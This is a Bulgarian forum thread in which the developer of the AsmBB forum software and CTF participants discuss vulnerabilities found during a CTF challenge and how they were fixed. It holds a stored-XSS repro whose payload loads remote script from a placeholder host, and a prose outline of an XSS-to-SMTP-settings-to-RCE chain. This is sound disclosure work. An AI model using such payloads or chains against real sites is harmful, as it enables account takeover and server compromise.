sisu
Създадено на 18.03.2023, видяно: 620 пъти. #87476
Пуснах нова тема, която уж би трябвало да повтори directory travesal от заглавието, таговете, етц на home page-а. Имаше още някакъв подобен бъг при простовете, трябва да проверя локално.
sisu
Последно редактирано на 18.03.2023 от sisu, видяно: 620 пъти. #87477
Относно онзи бъг при чата, където user-ът използва unicode да inject-не unescaped <.
Хм, по принцип има един проблем с рендера, че данните, които са от базата данни не трябва да се интерпретират като темплейт. И като че ли ги бях правил. Но очевидно последните уязвимости правят именно това – инжектират темплейтски команди.
Търся в момента къде е проблема.
sisu
Създадено на 18.03.2023, видяно: 617 пъти. #87479
Още един бъг но не успях да направя локал репро
1. create thread with title and description <script src="http://SOME_IP/evil.js></script>
2. quote
3. click !edit
XSS в <h1 class="thread_caption">
Credit: katzebin
sisu
Последно редактирано на 18.03.2023 от sisu, видяно: 617 пъти. #87480
Странен парсинг бъг
Credit: Copy ctf team
sisu
Създадено на 18.03.2023, видяно: 612 пъти. #87481
Благодаря отново! Ще изброя всички в релиз съобщението.
Само последно да уточня, че фикснах един бъг без да видя последните няколко поста – какво точно трябваше да се случи при тях? Сега оправени ли ти изглеждат?
sisu
Създадено на 18.03.2023, видяно: 594 пъти. #87487
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
Ами че то това трябва да си дава 404. Или пак нещо не разбрах?
sisu
Създадено на 18.03.2023, видяно: 585 пъти. #87489
challenge author
В общи линии знам за asmbb от около 2016 (?). По това време се подвизавах в оригиналния bgdev forum, където съответно разбрах за тази форум систем. Дори мисля, че бяхме обеминили някои коментари. По-млад и по-наивен си помислих, че тази система е яка и дори написах някой друг ред асембли тогава.
Години минават...
Преди година репортнах един бъг с PNG парсъра. По това време исках да имаме challenge за HXP CTF 2021, но не изглеждаше самия бъг да е exploitable дори всичко в 'engine' процеса да е RWX.
Известно време след това намерих един от бъговете по време на фъзване на bbcode парсъра, и така се създаде идея за този challenge. Като цяло идеята на оригиналното решение си беше: off-by-one in img tag parsing and missing sanitization of bbcode enablement, xss to update settings, admin visits page and via xss sends post req to settings to update smtp setting to gain RCE on user registration, register new user > RCE
Това беше и първия ми преглед на "web security" под формата на CTF. Не очаквах самите участници да намерят толкова бъгове.
Pls no sue
sisu
Създадено на 18.03.2023, видяно: 584 пъти. #87490
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
Ами че то това трябва да си дава 404. Или пак нещо не разбрах?
sisu
Създадено на 18.03.2023, видяно: 584 пъти. #87491
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404
Ами че то това трябва да си дава 404. Или пак нещо не разбрах?
По този повод, ако не е тайна, ти какво отношение имаш към цялата тази история?
challenge author
В общи линии знам за asmbb от около 2016 (?). По това време се подвизавах в оригиналния bgdev forum, където съответно разбрах за тази форум систем. Дори мисля, че бяхме обеминили някои коментари. По-млад и по-наивен си помислих, че тази система е яка и дори написах някой друг ред асембли тогава.
Години минават...
Преди година репортнах един бъг с PNG парсъра. По това време исках да имаме challenge за HXP CTF 2021, но не изглеждаше самия бъг да е exploitable дори всичко в 'engine' процеса да е RWX.
Известно време след това намерих един от бъговете по време на фъзване на bbcode парсъра, и така се създаде идея за този challenge. Като цяло идеята на оригиналното решение си беше: off-by-one in img tag parsing and missing sanitization of bbcode enablement, xss to update settings, admin visits page and via xss sends post req to settings to update smtp setting to gain RCE on user registration, register new user > RCE
Това беше и първия ми преглед на "web security" под формата на CTF. Не очаквах самите участници да намерят толкова бъгове.
Pls no sue
Викаш много бъгове. Е, "много" е относително понятие. XSS-ите и главно RCE-то са заради моята некомпетентност в HTML/JS. В смисъл, едни и същи грешки на няколко места правят много уязвимости, но се оправят лесно от едно място.
Останалите проблеми бяха в рендера на темплейти и парсерите. Днешните всички бяха поради тъпа грешка в кода – рендираше един и същи текст няколко пъти.
Както и да е, сам видя, че всичко се оправя бързо и безпроблемно. Което си е предимство на свободния софт.
Интересно решение с RCE, което няма нужда да се оправя:
Интересно на състезанието дали са го признали за вярно? Аз не бих.
@sisu, последен въпрос по темата – Youhang Wu (aka wupco) е от отбора "Straw Hat". Без да подценявам квалификацията на отбора, такова решение си прилича на чит.
Има ли подобни решения и при другите отбори и кои, ако не е тайна?
sisu
Създадено на 18.03.2023, видяно: 552 пъти. #87505
Интересно решение с RCE, което няма нужда да се оправя:
Интересно на състезанието дали са го признали за вярно? Аз не бих.
@sisu, последен въпрос по темата – Youhang Wu (aka wupco) е от отбора "Straw Hat". Без да подценявам квалификацията на отбора, такова решение си прилича на чит.
Има ли подобни решения и при другите отбори и кои, ако не е тайна?
sisu
Създадено на 18.03.2023, видяно: 537 пъти. #87511
Аз споделих решенията на другите отбори в темата.
Пропусна 796f75.
Когато този отбор е събмитнал флага, не видях да е имало трафик, който да експлоитва нещо. Всички други отбори са събмитнали веднага след експлойта и затова е лесно да се разбере чии експлойт на кого е.
Иначе прегледах целия трафик и не видях нещо ново. Не съм сигурен дали експлойтнали по-рано или е дублиран на някой друг отбор.
Когато този отбор е събмитнал флага, не видях да е имало трафик, който да експлоитва нещо. Всички други отбори са събмитнали веднага след експлойта и затова е лесно да се разбере чии експлойт на кого е.
Иначе прегледах целия трафик и не видях нещо ново. Не съм сигурен дали експлойтнали по-рано или е дублиран на някой друг отбор.